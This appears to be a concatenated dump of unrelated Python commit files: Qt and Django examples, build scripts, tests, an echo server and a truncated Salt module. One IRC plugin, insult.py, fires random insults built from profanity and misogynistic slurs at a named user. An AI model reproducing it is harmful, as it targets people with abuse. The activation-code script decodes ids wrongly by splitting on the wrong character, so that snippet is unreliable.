# - http://doc.qt.io/qt-5/qtwidgets-itemviews-spinboxdelegate-example.html
import sys
import datetime
from PyQt5.QtCore import Qt, QAbstractTableModel, QVariant
from PyQt5.QtWidgets import QApplication, QTableView, QStyledItemDelegate, QAction, QDateTimeEdit
DATETIME_FORMAT = '%Y-%m-%d %H:%M'
###############################################################################
class MyModel(QAbstractTableModel):
    """Single-column table model whose cells hold datetimes, or None for an
    'unset' value (rendered as the string "none")."""

    def __init__(self, parent=None):
        super().__init__(parent)
        # DON'T CALL THIS ATTRIBUTE "data", A METHOD ALREADY HAVE THIS NAME (model.data(index, role)) !!!
        self._data = [datetime.datetime.now() for j in range(3)]
        self._data[0] = None  # demonstrate the "no value" state in the first row

    def rowCount(self, parent):
        return len(self._data)

    def columnCount(self, parent):
        return 1

    def data(self, index, role):
        """Return the display string (DisplayRole) or the raw datetime/None
        (EditRole) for the cell at `index`."""
        if role == Qt.DisplayRole:
            value = self._data[index.row()]
            if value is None:
                value_str = "none"
            else:
                value_str = datetime.datetime.strftime(value, DATETIME_FORMAT)
            return value_str
        elif role == Qt.EditRole:
            # The delegate receives the raw datetime (or None), not a string.
            value = self._data[index.row()]
            return value
        return QVariant()

    def setData(self, index, value, role):
        """Store a value coming back from the delegate's editor."""
        if role == Qt.EditRole:
            try:
                self._data[index.row()] = value  # value is supposed to be a datetime object
                print(value)
                # The following line are necessary e.g. to dynamically update the QSortFilterProxyModel
                self.dataChanged.emit(index, index, [Qt.EditRole])
            except Exception as e:
                print(e)
                return False
        return True

    def flags(self, index):
        # Every cell is selectable, editable and enabled.
        return Qt.ItemIsSelectable | Qt.ItemIsEditable | Qt.ItemIsEnabled
###############################################################################
class MyDelegate(QStyledItemDelegate):
    """Item delegate editing datetime cells with a QDateTimeEdit that can be
    reset to None (cleared) via Ctrl+Delete."""

    def deleteActionCallback(self, editor, index):
        # Clear the cell (store None) and close the open editor widget.
        index.model().setData(index, None, Qt.EditRole)
        self.closeEditor.emit(editor)

    def createEditor(self, parent, option, index):
        """
        Create the widget used to edit a cell's value.

        Returns a "blank" widget: the editor's value is NOT initialised here
        (that happens in setEditorData). This is, however, where accepted
        min/max values and similar constraints are defined.

        https://doc.qt.io/qt-5/model-view-programming.html#providing-an-editor
        """
        editor = QDateTimeEdit(parent=parent)
        editor.setMinimumDate(datetime.datetime(year=2017, month=9, day=1, hour=8, minute=30))
        editor.setMaximumDate(datetime.datetime(year=2030, month=9, day=1, hour=18, minute=30))
        editor.setDisplayFormat("yyyy-MM-dd HH:mm")
        #editor.setCalendarPopup(True)

        # setFrame(): tell whether the line edit draws itself with a frame.
        # If enabled (the default) the line edit draws itself inside a frame, otherwise the line edit draws itself without any frame.
        editor.setFrame(False)

        # Ctrl+Delete inside the editor clears the cell back to None.
        action = QAction(editor)                     # <-
        action.setShortcut(Qt.CTRL | Qt.Key_Delete)  # <-
        #action.setShortcut(Qt.Key_Delete)   # the keyevent for the suppr key is already catched by the editor thus it doesn't work...
        action.triggered.connect(lambda : self.deleteActionCallback(editor, index))  # <-
        editor.addAction(action)                     # <-

        return editor

    def setEditorData(self, editor, index):
        """
        Initialise the editor widget's value for the cell being edited.

        The model's data is reachable through `index` (index.data(),
        index.model(), ...). This method:
            1. fetches the data from the **model** (index.data(), ...)
            2. calls the appropriate editor setter
               (e.g. editor.setValue(value) for a QSpinBox, ...)

        Mnemonic: model.data() -> editor.setValue()
        """
        value = index.data(Qt.EditRole)  # equivalent of value = index.model().data(index, Qt.EditRole)
        if value is None:
            # No stored datetime: seed the editor with "now".
            value = datetime.datetime.now()
        editor.setDateTime(value)  # value cannot be a string, it has to be a datetime...

    def setModelData(self, editor, model, index):
        """
        Submit editor's (widget) data to the *model*.

        When the user has finished editing the value,
        the view asks the delegate to store the edited value in the model by calling the setModelData() function.

        This method:
            1. reads the value from the **editor widget** with the
               appropriate getter (e.g. editor.value() for a QSpinBox...)
            2. writes the value into the model at the right index:
               model.setData(...)

        https://doc.qt.io/qt-5/model-view-programming.html#submitting-data-to-the-model

        Mnemonic: editor.value() -> model.setData()
        """
        editor.interpretText()
        dt_value = editor.dateTime().toPyDateTime()
        # Seconds/microseconds are not part of the display format; zero them.
        dt_value = dt_value.replace(second=0, microsecond=0)  # https://docs.python.org/3.5/library/datetime.html#datetime.datetime.replace
        model.setData(index, dt_value, Qt.EditRole)

    def updateEditorGeometry(self, editor, option, index):
        """
        It is the responsibility of the delegate to manage the editor's geometry.
        The geometry must be set when the editor is created, and when the item's size or position in the view is changed.
        Fortunately, the view provides all the necessary geometry information inside a view option object.

        In this case, we just use the geometry information provided by the view option in the item rectangle.
        A delegate that renders items with several elements would not use the item rectangle directly.
        It would position the editor in relation to the other elements in the item.

        https://doc.qt.io/qt-5/model-view-programming.html#updating-the-editor-s-geometry
        """
        editor.setGeometry(option.rect)
if __name__ == '__main__':
    app = QApplication(sys.argv)

    # Wire a table view to the datetime model and install the custom delegate.
    table_view = QTableView()
    my_model = MyModel()
    table_view.setModel(my_model)
    delegate = MyDelegate()
    table_view.setItemDelegate(delegate)
    table_view.show()

    # The mainloop of the application. The event handling starts from this point.
    # The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead.
    exit_code = app.exec_()

    # The sys.exit() method ensures a clean exit.
    # The environment will be informed, how the application ended.
    sys.exit(exit_code)
| Python | 0.000002 | |
3acbccb289ff74d063c4809d8fc20235e99ea314 | When an assert fails, print the data that failed the assert so the problem can be triaged. BUG=none TEST=none Review URL: http://codereview.chromium.org/285005 | webkit/build/rule_binding.py | webkit/build/rule_binding.py | #!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# usage: rule_binding.py INPUT CPPDIR HDIR -- INPUTS -- OPTIONS
#
# INPUT is an IDL file, such as Whatever.idl.
#
# CPPDIR is the directory into which V8Whatever.cpp will be placed. HDIR is
# the directory into which V8Whatever.h will be placed.
#
# The first item in INPUTS is the path to generate-bindings.pl. Remaining
# items in INPUTS are used to build the Perl module include path.
#
# OPTIONS are passed as-is to generate-bindings.pl as additional arguments.
import errno
import os
import shlex
import shutil
import subprocess
import sys
def SplitArgsIntoSections(args):
    """Partition *args* into sections delimited by '--' markers.

    Each '--' closes the current section; a trailing '--' therefore yields
    a final empty section.  An empty input yields no sections at all.
    """
    if not args:
        return []
    sections = []
    current = []
    for arg in args:
        if arg == '--':
            # Close the section that ends at this marker.
            sections.append(current)
            current = []
        else:
            current.append(arg)
    # Whatever follows the last marker (possibly nothing) is the final section.
    sections.append(current)
    return sections
def main(args):
    """Drive generate-bindings.pl for one IDL file.

    ``args`` is the full argv: the script name, then three '--'-separated
    sections (see module header): [INPUT, CPPDIR, HDIR], the Perl inputs
    (generator script first, then modules defining the -I path), and extra
    options passed straight through to generate-bindings.pl.
    Returns the Perl process's exit code (asserted to be 0).
    """
    sections = SplitArgsIntoSections(args[1:])
    assert len(sections) == 3, sections
    (base, inputs, options) = sections
    assert len(base) == 3, base
    (input, cppdir, hdir) = base
    assert len(inputs) > 1, inputs
    # First input is the generator script; the rest define the Perl -I path.
    generate_bindings = inputs[0]
    perl_modules = inputs[1:]
    include_dirs = []
    for perl_module in perl_modules:
        include_dir = os.path.dirname(perl_module)
        if not include_dir in include_dirs:
            include_dirs.append(include_dir)
    # The defines come in as one flat string. Split it up into distinct arguments.
    if '--defines' in options:
        defines_index = options.index('--defines')
        if defines_index + 1 < len(options):
            split_options = shlex.split(options[defines_index + 1])
            if split_options:
                options[defines_index + 1] = ' '.join(split_options)
    # Build up the command.
    command = ['perl', '-w']
    for include_dir in include_dirs:
        command.extend(['-I', include_dir])
    command.append(generate_bindings)
    command.extend(options)
    command.extend(['--outputDir', cppdir, input])
    # Do it. check_call is new in 2.5, so simulate its behavior with call and
    # assert.
    return_code = subprocess.call(command)
    assert return_code == 0
    # Both the .cpp and .h were generated in cppdir, but if hdir is different,
    # the .h needs to move. Copy it instead of using os.rename for maximum
    # portability in all cases.
    if cppdir != hdir:
        input_basename = os.path.basename(input)
        (root, ext) = os.path.splitext(input_basename)
        hname = 'V8%s.h' % root
        hsrc = os.path.join(cppdir, hname)
        hdst = os.path.join(hdir, hname)
        shutil.copyfile(hsrc, hdst)
        os.unlink(hsrc)
    return return_code
if __name__ == '__main__':
    sys.exit(main(sys.argv))
| #!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# usage: rule_binding.py INPUT CPPDIR HDIR -- INPUTS -- OPTIONS
#
# INPUT is an IDL file, such as Whatever.idl.
#
# CPPDIR is the directory into which V8Whatever.cpp will be placed. HDIR is
# the directory into which V8Whatever.h will be placed.
#
# The first item in INPUTS is the path to generate-bindings.pl. Remaining
# items in INPUTS are used to build the Perl module include path.
#
# OPTIONS are passed as-is to generate-bindings.pl as additional arguments.
import errno
import os
import shlex
import shutil
import subprocess
import sys
def SplitArgsIntoSections(args):
    """Split *args* on '--' markers into a list of sections.

    A trailing '--' produces a final empty section; an empty input
    produces an empty list of sections.
    """
    sections = []
    remaining = list(args)
    while remaining:
        if '--' in remaining:
            cut = remaining.index('--')
        else:
            # No marker left: the rest is one whole section.
            cut = len(remaining)
        sections.append(remaining[:cut])
        if cut + 1 == len(remaining):
            # '--' was the final element: record the empty section after it.
            sections.append([])
            remaining = []
        else:
            remaining = remaining[cut + 1:]
    return sections
def main(args):
    """Drive generate-bindings.pl for one IDL file.

    ``args`` is the full argv: the script name, then three '--'-separated
    sections: [INPUT, CPPDIR, HDIR], the Perl inputs (generator script
    first, then modules defining the -I path), and extra options passed
    straight through to generate-bindings.pl.
    Returns the Perl process's exit code (asserted to be 0).
    """
    sections = SplitArgsIntoSections(args[1:])
    # Include the offending data in the assert message so a failure can be
    # triaged from the log alone (previously the asserts carried no data).
    assert len(sections) == 3, sections
    (base, inputs, options) = sections
    assert len(base) == 3, base
    # Tuple unpacking instead of element-wise indexing.
    (input, cppdir, hdir) = base
    assert len(inputs) > 1, inputs
    # First input is the generator script; the rest define the Perl -I path.
    generate_bindings = inputs[0]
    perl_modules = inputs[1:]
    include_dirs = []
    for perl_module in perl_modules:
        include_dir = os.path.dirname(perl_module)
        if not include_dir in include_dirs:
            include_dirs.append(include_dir)
    # The defines come in as one flat string. Split it up into distinct arguments.
    if '--defines' in options:
        defines_index = options.index('--defines')
        if defines_index + 1 < len(options):
            split_options = shlex.split(options[defines_index + 1])
            if split_options:
                options[defines_index + 1] = ' '.join(split_options)
    # Build up the command.
    command = ['perl', '-w']
    for include_dir in include_dirs:
        command.extend(['-I', include_dir])
    command.append(generate_bindings)
    command.extend(options)
    command.extend(['--outputDir', cppdir, input])
    # Do it. check_call is new in 2.5, so simulate its behavior with call and
    # assert.
    return_code = subprocess.call(command)
    assert return_code == 0
    # Both the .cpp and .h were generated in cppdir, but if hdir is different,
    # the .h needs to move. Copy it instead of using os.rename for maximum
    # portability in all cases.
    if cppdir != hdir:
        input_basename = os.path.basename(input)
        (root, ext) = os.path.splitext(input_basename)
        hname = 'V8%s.h' % root
        hsrc = os.path.join(cppdir, hname)
        hdst = os.path.join(hdir, hname)
        shutil.copyfile(hsrc, hdst)
        os.unlink(hsrc)
    return return_code
if __name__ == '__main__':
    sys.exit(main(sys.argv))
| Python | 0.999999 |
c48d852c2ceb39e6692be1b2c270aa75156e5b5e | Add migrations/0121_….py | ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py | ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py | # -*- coding: utf-8 -*-
# Inspired by:
# https://github.com/lingdb/CoBL/issues/223#issuecomment-256815113
from __future__ import unicode_literals, print_function
from django.db import migrations
def forwards_func(apps, schema_editor):
    """Copy Hindi lexeme transliterations onto the matching Urdu lexemes.

    Only acts on meanings where Hindi and Urdu each have exactly one
    lexeme, and only fills Urdu transliterations that are still empty.
    """
    Language = apps.get_model("lexicon", "Language")
    Meaning = apps.get_model("lexicon", "Meaning")
    Lexeme = apps.get_model("lexicon", "Lexeme")
    hindi = Language.objects.get(ascii_name='Hindi')
    urdu = Language.objects.get(ascii_name='Urdu')
    for meaning in Meaning.objects.all():
        hLexemes = Lexeme.objects.filter(language=hindi, meaning=meaning).all()
        uLexemes = Lexeme.objects.filter(language=urdu, meaning=meaning).all()
        if len(hLexemes) != 1 or len(uLexemes) != 1:
            # Ambiguous mapping between the two languages; skip rather than guess.
            continue
        hLex = hLexemes[0]
        uLex = uLexemes[0]
        if uLex.transliteration == '' and hLex.transliteration != '':
            uLex.transliteration = hLex.transliteration
            uLex.save()
def reverse_func(apps, schema_editor):
    """Intentional no-op reverse: copied transliterations are kept."""
    print('Reverse of 0121_copy_hindi_transliteration_to_urdu does nothing.')
class Migration(migrations.Migration):
    # Pure data migration; the actual work happens in forwards_func/reverse_func.
    dependencies = [('lexicon', '306_0127_fix_issue_223')]
    operations = [
        migrations.RunPython(forwards_func, reverse_func),
    ]
| Python | 0 | |
da5bd8b1afcffd8a0509a785183ce1474fe7f53c | Create insult.py | insult.py | insult.py | """By Bowserinator: Insults people :D"""
from utils import add_cmd, add_handler
import utils
import random
# Bot plugin metadata: module name and the chat trigger(s) it answers to.
name = "insult"
cmds = ["insult"]
# Sentence templates; each "[REPLACE]" slot is filled with a random word
# from `badwords` below (lower-cased at use time).
insultPattern = [
    "That [REPLACE] just cut me off!",
    "My boss is a major [REPLACE]!",
    "Don't tell her I said this, but that dude she's with is a real [REPLACE]!",
    "Quit being such a [REPLACE]!",
    "The only people who would vote for that guy are total [REPLACE]s!",
    "What are you, some kind of [REPLACE]?",
    "Dude's a real [REPLACE], you know what I mean?",
    "He's got an ego like a [REPLACE]!",
    "She was being a real [REPLACE] at the store today!",
    "That [REPLACE] developer's code refuses to compile!",
    "Her kids are total [REPLACE]s!",
    "Whoever wrote this API documentation is a complete [REPLACE]!",
    "That guy has the personality of a [REPLACE]!",
    "I'm pretty sure I was a total [REPLACE] at the bar last night.",
    "What kind of [REPLACE] buys pre-ground coffee?",
    "I'd rather get a [REPLACE] to the eye than sit through this lecture.",
    "Wow, that [REPLACE] just went off the deep end.",
    "I may be a jerk, but at least I'm not like that [REPLACE] over there.",
    "I need that like I need a [REPLACE] on my elbow.",
    "What kind of [REPLACE] slows down to merge on the highway?",
    "You've got a face like a [REPLACE].",
    "Nothing personal, but you're a real [REPLACE].",
    "What a bunch of [REPLACE]s.",
    "That [REPLACE] is legally dead in 27 states - plus Guam.",
]
# Words substituted into the [REPLACE] slot.
badwords = [
    'Ass',
    'Bitch',
    'Butt',
    'Cock',
    'Cum',
    'Cunt',
    'Dick',
    'Douche',
    'Fart',
    'Fuck',
    'Jizz',
    'Schlong',
    'Shit',
    'Slut',
    'Snatch',
    'Tit',
    'Twat',
    'Wang',
    'Wank',
    'Whore',
]
@add_cmd
def extract(irc, event, args):
    # Reply with a random insult template aimed at args[0].
    # \x02 = IRC bold, \x0f = reset formatting (mIRC control codes).
    # NOTE(review): assumes at least one argument (the target nick);
    # args[0] raises IndexError otherwise -- confirm the framework
    # guarantees this before the handler is invoked.
    send = "\x02" + args[0] +", \x0f" + random.choice(insultPattern).replace("[REPLACE]",random.choice(badwords).lower())
    irc.reply(event, send)
# NOTE(review): `insult` is not defined anywhere in this module -- as written
# this looks like it would raise NameError at import time; verify against
# add_handler's contract (other plugins may pass the module object instead).
add_handler(insult, name)
| Python | 0.001151 | |
1a1bf760f9d912f6c19943b58198d947b4e65b84 | Add mraa GPIO test | meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py | meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py | from oeqa.oetest import oeRuntimeTest
import unittest
import subprocess
from time import sleep
class MraaGpioTest(oeRuntimeTest):
    '''
    These tests require to use BeagleBone as testing host
    '''
    # GPIO pin number on the target board, chosen per platform in setUp().
    pin = ""
    def setUp(self):
        # Identify the target platform from the mraa version banner and pick
        # a suitable GPIO pin; skip the test on unknown hardware.
        (status, output)= self.target.run("mraa-gpio version")
        output = output.lower()
        if any(x in output for x in ("broxton", "tuchuck", "joule")):
            self.pin = "51"
        elif "minnowboard" in output:
            self.pin = "25"
        else:
            raise unittest.SkipTest(output)
    def test_gpio(self):
        '''
        Test a GPIO pin on and off and check the pin output with
        BeagleBone
        '''
        def check_gpio_output():
            # Read the pin level as observed on the test host.
            # NOTE(review): assumes the host's gpio20 is wired to the pin
            # under test and already exported -- confirm the rig setup.
            cmd = "cat /sys/class/gpio/gpio20/value".split()
            output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
            return int(output)
        # Drive the pin low/high/low, pausing for the level to settle before
        # sampling it from the host side.
        self.target.run("mraa-gpio set " + self.pin + " 0")
        sleep(1)
        output = check_gpio_output()
        self.assertEqual(output, 0, msg="GPIO pin output is not 0")
        self.target.run("mraa-gpio set " + self.pin + " 1")
        sleep(1)
        output = check_gpio_output()
        self.assertEqual(output, 1, msg="GPIO pin output is not 1")
        self.target.run("mraa-gpio set " + self.pin + " 0")
        sleep(1)
        output = check_gpio_output()
        self.assertEqual(output, 0, msg="GPIO pin output is not 0")
| Python | 0.000001 | |
8b7e84e98ccf0b44d7c6cc6ff23f462ec648d3f0 | add test | msmbuilder/tests/test_feature_selection.py | msmbuilder/tests/test_feature_selection.py | import numpy as np
from sklearn.feature_selection import VarianceThreshold as VarianceThresholdR
from ..featurizer import DihedralFeaturizer
from ..feature_selection import FeatureSelector, VarianceThreshold
from ..example_datasets import fetch_alanine_dipeptide as fetch_data
# Candidate featurizers as (name, featurizer) pairs, selectable by name
# through FeatureSelector's which_feat argument.
FEATS = [
    ('phi', DihedralFeaturizer(types=['phi'], sincos=True)),
    ('psi', DihedralFeaturizer(types=['psi'], sincos=True)),
]
def test_featureselector():
    """Selecting 'phi' must reproduce the phi featurizer's output exactly."""
    dataset = fetch_data()
    trajectories = dataset["trajectories"]
    fs = FeatureSelector(FEATS, which_feat='phi')
    # A scalar which_feat is normalized to a single-element list.
    assert fs.which_feat == ['phi']
    y1 = fs.partial_transform(trajectories[0])
    y_ref1 = FEATS[0][1].partial_transform(trajectories[0])
    np.testing.assert_array_almost_equal(y_ref1, y1)
def test_featureselector_transform():
    """transform() must return one feature array per input trajectory."""
    dataset = fetch_data()
    trajectories = dataset["trajectories"]
    fs = FeatureSelector(FEATS, which_feat='psi')
    y1 = fs.transform(trajectories)
    assert len(y1) == len(trajectories)
def test_variancethreshold_vs_sklearn():
    """Our VarianceThreshold must agree with scikit-learn's reference."""
    dataset = fetch_data()
    trajectories = dataset["trajectories"]
    fs = FeatureSelector(FEATS)
    vt = VarianceThreshold(0.1)
    vtr = VarianceThresholdR(0.1)
    y = fs.partial_transform(trajectories[0])
    # Ours takes a list of trajectories' features; sklearn takes one array.
    z1 = vt.fit_transform([y])[0]
    z_ref1 = vtr.fit_transform(y)
    np.testing.assert_array_almost_equal(z_ref1, z1)
| import numpy as np
from sklearn.feature_selection import VarianceThreshold as VarianceThresholdR
from ..featurizer import DihedralFeaturizer
from ..feature_selection import FeatureSelector, VarianceThreshold
from ..example_datasets import fetch_alanine_dipeptide as fetch_data
# Candidate featurizers as (name, featurizer) pairs, selectable by name.
FEATS = [
    ('phi', DihedralFeaturizer(types=['phi'], sincos=True)),
    ('psi', DihedralFeaturizer(types=['psi'], sincos=True)),
]
def test_featureselector():
    """Selecting 'phi' must reproduce the phi featurizer's output exactly."""
    dataset = fetch_data()
    trajectories = dataset["trajectories"]
    fs = FeatureSelector(FEATS, which_feat='phi')
    # A scalar which_feat is normalized to a single-element list.
    assert fs.which_feat == ['phi']
    y1 = fs.partial_transform(trajectories[0])
    y_ref1 = FEATS[0][1].partial_transform(trajectories[0])
    np.testing.assert_array_almost_equal(y_ref1, y1)
def test_variancethreshold_vs_sklearn():
    """Our VarianceThreshold must agree with scikit-learn's reference."""
    dataset = fetch_data()
    trajectories = dataset["trajectories"]
    fs = FeatureSelector(FEATS)
    vt = VarianceThreshold(0.1)
    vtr = VarianceThresholdR(0.1)
    y = fs.partial_transform(trajectories[0])
    # Ours takes a list of trajectories' features; sklearn takes one array.
    z1 = vt.fit_transform([y])[0]
    z_ref1 = vtr.fit_transform(y)
    np.testing.assert_array_almost_equal(z_ref1, z1)
| Python | 0.000002 |
e2b74a9978de4a6f15273e3e098379107eb0bec3 | Create 0001_0.py | pylyria/0001/0001_0.py | pylyria/0001/0001_0.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#第 0001 题:做为 Apple Store App 独立开发者,你要搞限时促销,为你的应用生成激活码(或者优惠券),使用 Python 如何生成 200 个激活码(或者优惠券)?
import random
import string
def activation_code(id, length=16):
    """Build an activation code of *length* characters.

    Layout: the id in lowercase hex, a 'V' separator, then random
    uppercase letters and digits filling the remaining characters.
    """
    prefix = hex(int(id))[2:] + 'V'
    alphabet = string.ascii_uppercase + string.digits
    remaining = length - len(prefix)
    suffix = ''.join(random.choice(alphabet) for _ in range(remaining))
    return prefix + suffix
def get_id(code):
    """Recover the decimal id (as a string) from a hex id prefix."""
    value = int(code.upper(), 16)
    return str(value)
if __name__ == '__main__':
for i in range(10, 500, 23):
code = activation_code(i)
id_hex = code.split('L')[0]
id = get_id(id_hex)
print code,id
| Python | 0.019732 | |
82f9edd572d440941e7de67398b3fdeb52d5c389 | Add new migration | modelview/migrations/0047_auto_20191021_1525.py | modelview/migrations/0047_auto_20191021_1525.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-21 13:25
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated field tweaks: widen the license choice list on
    BasicFactsheet and adjust verbose names / nullability on several
    EnergyFramework fields."""
    dependencies = [
        ('modelview', '0046_auto_20191007_1630'),
    ]
    operations = [
        migrations.AlterField(
            model_name='basicfactsheet',
            name='license',
            field=models.CharField(choices=[('Academic Free License v3.0', 'Academic Free License v3.0'), ('Apache license 2.0', 'Apache license 2.0'), ('Artistic license 2.0', 'Artistic license 2.0'), ('Boost Software License 1.0', 'Boost Software License 1.0'), ('BSD 2-clause "Simplified" license', 'BSD 2-clause "Simplified" license'), ('BSD 3-clause Clear license', 'BSD 3-clause Clear license'), ('Creative Commons license family', 'Creative Commons license family'), ('Creative Commons Zero v1.0 Universal', 'Creative Commons Zero v1.0 Universal'), ('Creative Commons Attribution 4.0', 'Creative Commons Attribution 4.0'), ('Creative Commons Attribution Share Alike 4.0', 'Creative Commons Attribution Share Alike 4.0'), ('Do What The F*ck You Want To Public License', 'Do What The F*ck You Want To Public License'), ('Educational Community License v2.0', 'Educational Community License v2.0'), ('Eclipse Public License 1.0', 'Eclipse Public License 1.0'), ('European Union Public License 1.1', 'European Union Public License 1.1'), ('GNU Affero General Public License v3.0', 'GNU Affero General Public License v3.0'), ('GNU General Public License family', 'GNU General Public License family'), ('GNU General Public License v2.0', 'GNU General Public License v2.0'), ('GNU General Public License v3.0', 'GNU General Public License v3.0'), ('GNU Lesser General Public License family', 'GNU Lesser General Public License family'), ('GNU Lesser General Public License v2.1', 'GNU Lesser General Public License v2.1'), ('GNU Lesser General Public License v3.0', 'GNU Lesser General Public License v3.0'), ('ISC', 'ISC'), ('LaTeX Project Public License v1.3c', 'LaTeX Project Public License v1.3c'), ('Microsoft Public License', 'Microsoft Public License'), ('MIT', 'MIT'), ('Mozilla Public License 2.0', 'Mozilla Public License 2.0'), ('Open Software License 3.0', 'Open Software License 3.0'), ('PostgreSQL License', 'PostgreSQL License'), ('SIL Open Font License 1.1', 'SIL Open Font License 1.1'), ('University of Illinois/NCSA Open Source License', 'University of Illinois/NCSA Open Source License'), ('The Unlicense', 'The Unlicense'), ('zLib License', 'zLib License'), ("BSD 3-clause 'New' or 'Revised' license", "BSD 3-clause 'New' or 'Revised' license"), ('Other', 'Other'), ('Unknown', 'Unknown')], default='Unknown', max_length=20, verbose_name='License'),
        ),
        migrations.AlterField(
            model_name='energyframework',
            name='ci_FuelHandling',
            field=models.BooleanField(default=False, verbose_name='Fuel handling'),
        ),
        migrations.AlterField(
            model_name='energyframework',
            name='gs_single_project',
            field=models.BooleanField(default=False, verbose_name='Single-project'),
        ),
        migrations.AlterField(
            model_name='energyframework',
            # NOTE: 'inital' misspelling is preserved -- it matches the model field.
            name='inital_release_date',
            field=models.DateField(help_text='When [mm-yyyy] was the framework initially released?', max_length=30, null=True, verbose_name='Inital Release Date'),
        ),
        migrations.AlterField(
            model_name='energyframework',
            name='last_updated',
            field=models.DateField(help_text='When was the factsheet last updated?', max_length=200, null=True, verbose_name='Last updated'),
        ),
    ]
| Python | 0 | |
45db21e2b4093cbda7976189327467ca3aebe1a3 | add instance serializer | api/v2/serializers/instance_serializer.py | api/v2/serializers/instance_serializer.py | from core.models import Instance
from rest_framework import serializers
from .identity_summary_serializer import IdentitySummarySerializer
from .user_serializer import UserSerializer
class InstanceSerializer(serializers.ModelSerializer):
    """DRF serializer for Instance: nests the creating identity and user
    under friendlier API field names."""
    identity = IdentitySummarySerializer(source='created_by_identity')
    user = UserSerializer(source='created_by')
    class Meta:
        model = Instance
        fields = ('id', 'name', 'ip_address', 'shell', 'vnc', 'start_date', 'end_date', 'identity', 'user')
| Python | 0.000001 | |
3fc5c2a4d3f13dc8062c93dd86fd94f06c35c91d | add an easy echo server by using python | network/echo-server/echo-iterative/main.py | network/echo-server/echo-iterative/main.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2016 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import socket
def handle(client_socket, client_address):
    # Echo everything received back to the peer until the peer closes the
    # connection (recv returns ''), then close the socket. Python 2 code.
    while True:
        data = client_socket.recv(4096)
        if data:
            # NOTE(review): send() may transmit fewer bytes than len(data);
            # sendall() would guarantee the full echo -- confirm intended.
            sent = client_socket.send(data)
        else:
            print 'disconnect', client_address
            client_socket.close()
            break
def main():
listen_address = ('0.0.0.0', 5555)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(listen_address)
server_socket.listen(5)
while True:
(client_socket, client_address) = server_socket.accept()
print 'got connection from', client_address
handle(client_socket, client_address)
if __name__ == '__main__':
main()
| Python | 0.000002 | |
48d774b8bdcaa924303b905cef27b4eb13f08fd6 | Add pillar_roots to the wheel system | salt/wheel/pillar_roots.py | salt/wheel/pillar_roots.py | '''
The `pillar_roots` wheel module is used to manage files under the pillar roots
directories on the master server.
'''
# Import python libs
import os
# Import salt libs
import salt.utils
def find(path, env='base'):
    '''
    Return a dict of the files located with the given path and environment
    '''
    # Return a list of paths + text or bin
    # (one single-key dict per match: {full_path: 'txt'|'bin'})
    ret = []
    if env not in __opts__['pillar_roots']:
        return ret
    for root in __opts__['pillar_roots'][env]:
        full = os.path.join(root, path)
        if os.path.isfile(full):
            # Add it to the dict
            # Tag each match as text or binary so read() knows which
            # files it may safely return as text.
            with open(full, 'rb') as fp_:
                if salt.utils.istextfile(fp_):
                    ret.append({full: 'txt'})
                else:
                    ret.append({full: 'bin'})
    return ret
def list_env(env='base'):
    '''
    Return all of the file paths found in an environment
    '''
    # Nested dict mirroring the directory tree under each pillar root:
    # directories map to sub-dicts, files map to the marker string 'f'.
    ret = {}
    if not env in __opts__['pillar_roots']:
        return ret
    for f_root in __opts__['pillar_roots'][env]:
        ret[f_root] = {}
        for root, dirs, files in os.walk(f_root):
            sub = ret[f_root]
            if root != f_root:
                # grab subroot ref
                sroot = root
                above = []
                # Populate the above dict
                # (path components between f_root and the current dir)
                while not os.path.samefile(sroot, f_root):
                    base = os.path.basename(sroot)
                    if base:
                        above.insert(0, base)
                    sroot = os.path.dirname(sroot)
                # Descend to the dict node representing the current directory.
                for aroot in above:
                    sub = sub[aroot]
            for dir_ in dirs:
                sub[dir_] = {}
            for fn_ in files:
                sub[fn_] = 'f'
    return ret
def list_roots():
    '''
    Return all of the files names in all available environments
    '''
    # One entry per environment; each wraps its list_env() tree in a list.
    return dict((env, [list_env(env)]) for env in __opts__['pillar_roots'])
def read(path, env='base'):
    '''
    Read the contents of a text file, if the file is binary then
    it is skipped.
    '''
    # Return a dict of paths + content
    ret = []
    files = find(path, env)
    for fn_ in files:
        # Each entry is a single-key dict of {full_path: 'txt'|'bin'}.
        # next(iter(...)) grabs that key and, unlike dict.keys()[0],
